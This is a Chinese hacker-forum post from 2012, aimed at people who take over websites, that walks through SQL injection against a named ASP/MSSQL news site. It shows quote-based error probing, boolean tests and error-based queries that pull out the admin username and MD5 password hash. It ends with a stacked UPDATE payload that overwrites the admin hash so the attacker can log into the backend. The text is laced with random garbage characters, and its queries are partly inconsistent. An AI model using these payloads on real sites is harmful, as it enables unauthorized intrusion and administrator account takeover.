经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
0 U' C* {; Y' ^$ Y3 A N. Z可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)% z9 B' ?3 Z2 h2 Q' |. a& f3 h' k
测试如下:- r- U2 o' d, X- \, x6 P0 E& l3 a
http://www.tmdsb.com/news.asp?id=121. {3 W, V6 \) b+ Y; D% ~9 S
在地址后输入单引号,显示
( o- c0 I, G+ g! ?, B# ^( P4 kMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’$ {1 g7 ^4 [+ L& Z8 M$ \, e
字符串 ’’’ 之前有未闭合的引号1 h2 r4 j6 X) l1 P6 v* b5 j
/news/tmdws.asp,行63* o4 B' [1 i$ w& Y6 l# k; ~9 p
说明没有过滤单引号且数据库是MSSQL.: r& P# ?: n) v6 X- R( _
and 1=1正常。and 1=2出错。肯定存在注入 L: I; x3 T$ x+ k) E
接着输入$ V( M: A% X/ \0 n: A9 d5 D
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)8 s6 z* E/ A) c" b+ l! ~
得到帐号为:admin' h6 P R- `) \3 ]
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
- Q0 R3 d3 y W; q' A得到密码为:a4716077c2ba075c: ]. G/ I1 ^) n% u+ d
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
. \; u+ l/ T* l9 ~0 t6 A% }命令如下 :+ M# H; i( [! q" w1 T1 l3 f( M: ^
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
2 L0 P; n1 W/ b z- s这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41